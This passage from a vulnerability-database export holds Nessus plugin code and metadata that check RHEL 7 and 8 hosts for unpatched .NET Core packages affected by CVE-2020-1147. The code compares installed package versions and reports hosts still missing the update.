script_xref(name:\"IAVA\", value:\"2020-A-0304-S\");\n\n script_name(english:\"RHEL 7 : .NET Core 2.1 on Red Hat Enterprise Linux (RHSA-2020:2937)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2937 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2937\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1856929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet-runtime-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet-sdk-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet-sdk-2.1.5xx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-runtime\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/dotnet/1/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/dotnet/1/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/dotnet/1/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/dotnet/1/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/dotnet/1/os',\n 'content/dist/rhel/server/7/7Server/x86_64/dotnet/1/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/dotnet/1/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/dotnet/1/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/dotnet/1/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'rh-dotnet21-2.1-19.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet21'},\n {'reference':'rh-dotnet21-dotnet-2.1.516-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet21'},\n {'reference':'rh-dotnet21-dotnet-host-2.1.20-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet21'},\n {'reference':'rh-dotnet21-dotnet-runtime-2.1-2.1.20-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet21'},\n {'reference':'rh-dotnet21-dotnet-sdk-2.1-2.1.516-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet21'},\n {'reference':'rh-dotnet21-dotnet-sdk-2.1.5xx-2.1.516-1.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet21'},\n {'reference':'rh-dotnet21-runtime-2.1-19.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rh-dotnet21'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'rh-dotnet21 / rh-dotnet21-dotnet / rh-dotnet21-dotnet-host / etc');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T14:25:36", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2938 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "type": "nessus", "title": "RHEL 8 : .NET Core (RHSA-2020:2938)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:rhel_aus:8.2", "cpe:/o:redhat:rhel_aus:8.4", "cpe:/o:redhat:rhel_aus:8.6", "cpe:/o:redhat:rhel_e4s:8.2", "cpe:/o:redhat:rhel_e4s:8.4", "cpe:/o:redhat:rhel_e4s:8.6", "cpe:/o:redhat:rhel_eus:8.2", "cpe:/o:redhat:rhel_eus:8.4", "cpe:/o:redhat:rhel_eus:8.6", "cpe:/o:redhat:rhel_tus:8.2", "cpe:/o:redhat:rhel_tus:8.4", "cpe:/o:redhat:rhel_tus:8.6", "p-cpe:/a:redhat:enterprise_linux:dotnet-host-fxr-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-runtime-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1.5xx"], "id": "REDHAT-RHSA-2020-2938.NASL", "href": "https://www.tenable.com/plugins/nessus/138500", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2938. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138500);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2938\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0305-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0304-S\");\n\n script_name(english:\"RHEL 8 : .NET Core (RHSA-2020:2938)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2938 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2938\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1856929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-host-fxr-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-runtime-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1.5xx\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.2/x86_64/appstream/debug',\n 'content/aus/rhel8/8.2/x86_64/appstream/os',\n 'content/aus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.2/x86_64/baseos/debug',\n 'content/aus/rhel8/8.2/x86_64/baseos/os',\n 'content/aus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.2/x86_64/appstream/os',\n 'content/e4s/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.2/x86_64/baseos/os',\n 'content/e4s/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/sap/debug',\n 'content/e4s/rhel8/8.2/x86_64/sap/os',\n 'content/e4s/rhel8/8.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/appstream/debug',\n 'content/eus/rhel8/8.2/x86_64/appstream/os',\n 'content/eus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/baseos/debug',\n 'content/eus/rhel8/8.2/x86_64/baseos/os',\n 'content/eus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.2/x86_64/highavailability/os',\n 'content/eus/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/sap/debug',\n 'content/eus/rhel8/8.2/x86_64/sap/os',\n 'content/eus/rhel8/8.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.2/x86_64/supplementary/os',\n 'content/eus/rhel8/8.2/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/appstream/debug',\n 'content/tus/rhel8/8.2/x86_64/appstream/os',\n 'content/tus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/baseos/debug',\n 'content/tus/rhel8/8.2/x86_64/baseos/os',\n 'content/tus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.2/x86_64/highavailability/os',\n 'content/tus/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/nfv/debug',\n 'content/tus/rhel8/8.2/x86_64/nfv/os',\n 'content/tus/rhel8/8.2/x86_64/nfv/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/rt/debug',\n 'content/tus/rhel8/8.2/x86_64/rt/os',\n 'content/tus/rhel8/8.2/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'dotnet-host-fxr-2.1-2.1.20-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-2.1-2.1.20-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1-2.1.516-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1.5xx-2.1.516-1.el8_2', 'sp':'2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.4/x86_64/appstream/debug',\n 'content/aus/rhel8/8.4/x86_64/appstream/os',\n 'content/aus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.4/x86_64/baseos/debug',\n 'content/aus/rhel8/8.4/x86_64/baseos/os',\n 'content/aus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.4/x86_64/appstream/os',\n 'content/e4s/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.4/x86_64/baseos/os',\n 'content/e4s/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.4/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.4/x86_64/sap/debug',\n 'content/e4s/rhel8/8.4/x86_64/sap/os',\n 'content/e4s/rhel8/8.4/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/appstream/debug',\n 'content/eus/rhel8/8.4/x86_64/appstream/os',\n 'content/eus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/baseos/debug',\n 'content/eus/rhel8/8.4/x86_64/baseos/os',\n 'content/eus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.4/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.4/x86_64/highavailability/os',\n 'content/eus/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.4/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.4/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/sap/debug',\n 'content/eus/rhel8/8.4/x86_64/sap/os',\n 'content/eus/rhel8/8.4/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.4/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.4/x86_64/supplementary/os',\n 'content/eus/rhel8/8.4/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/appstream/debug',\n 'content/tus/rhel8/8.4/x86_64/appstream/os',\n 'content/tus/rhel8/8.4/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/baseos/debug',\n 'content/tus/rhel8/8.4/x86_64/baseos/os',\n 'content/tus/rhel8/8.4/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.4/x86_64/highavailability/os',\n 'content/tus/rhel8/8.4/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/nfv/debug',\n 'content/tus/rhel8/8.4/x86_64/nfv/os',\n 'content/tus/rhel8/8.4/x86_64/nfv/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/rt/debug',\n 'content/tus/rhel8/8.4/x86_64/rt/os',\n 'content/tus/rhel8/8.4/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'dotnet-host-fxr-2.1-2.1.20-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-2.1-2.1.20-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1-2.1.516-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1.5xx-2.1.516-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.6/x86_64/appstream/debug',\n 'content/aus/rhel8/8.6/x86_64/appstream/os',\n 'content/aus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.6/x86_64/baseos/debug',\n 'content/aus/rhel8/8.6/x86_64/baseos/os',\n 'content/aus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.6/x86_64/appstream/os',\n 'content/e4s/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.6/x86_64/baseos/os',\n 'content/e4s/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/sap/debug',\n 'content/e4s/rhel8/8.6/x86_64/sap/os',\n 'content/e4s/rhel8/8.6/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/appstream/debug',\n 'content/eus/rhel8/8.6/x86_64/appstream/os',\n 'content/eus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/baseos/debug',\n 'content/eus/rhel8/8.6/x86_64/baseos/os',\n 'content/eus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.6/x86_64/highavailability/os',\n 'content/eus/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/debug',\n 